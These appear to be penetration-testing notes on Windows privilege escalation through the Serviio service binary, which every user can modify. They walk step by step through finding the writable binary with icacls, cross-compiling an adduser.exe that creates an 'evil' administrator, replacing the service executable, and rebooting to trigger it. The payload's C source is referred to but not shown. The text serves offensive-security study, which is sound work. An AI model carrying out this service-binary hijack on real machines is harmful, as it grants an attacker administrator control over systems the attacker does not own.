Binary hijacking / Insecure File permissions

Another way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system.
Example:
Serviio service

• Check running service in cmd and then look for any suspicious one
  
  Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
  C:\Program Files\Serviio\bin\ServiioService.exe look suspicious
  

• Check permission on suspicious service with icacls window utility in cmd
  F Full access , M Modify access , RX Read and execute access , W Write-only access
  
  icacls "C:\Program Files\Serviio\bin\ServiioService.exe”
  
  It give output with BUILTIN\Users:(I)(F) means any user has full access

• C code that will create evil user and add it in local Administrator group
  
  

• Compile adduser.c in linux
  
  i686-w64-mingw32-gcc adduser.c -o adduser.exe

• replace the original ServiioService.exe binary with our malicious copy:
  
  move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe”
  
  move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe”
  
  dir "C:\Program Files\Serviio\bin\”
  

• Restart the service
  
  net stop Serviio
  
  But most of the time current user don’t have permission to restart service . But service may be set to “Auto” restart after system reboot. To check the same
  
  wmic service where caption="Serviio" get name, caption, state, startmode

• Check if current user has permission to reboot
  
  whoami /priv

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled

• Reboot
  
  shutdown /r /t 0

• Now login with “evil” “Ev!lpass” and check evil user in local Administrator group
  
  net localgroup Administrators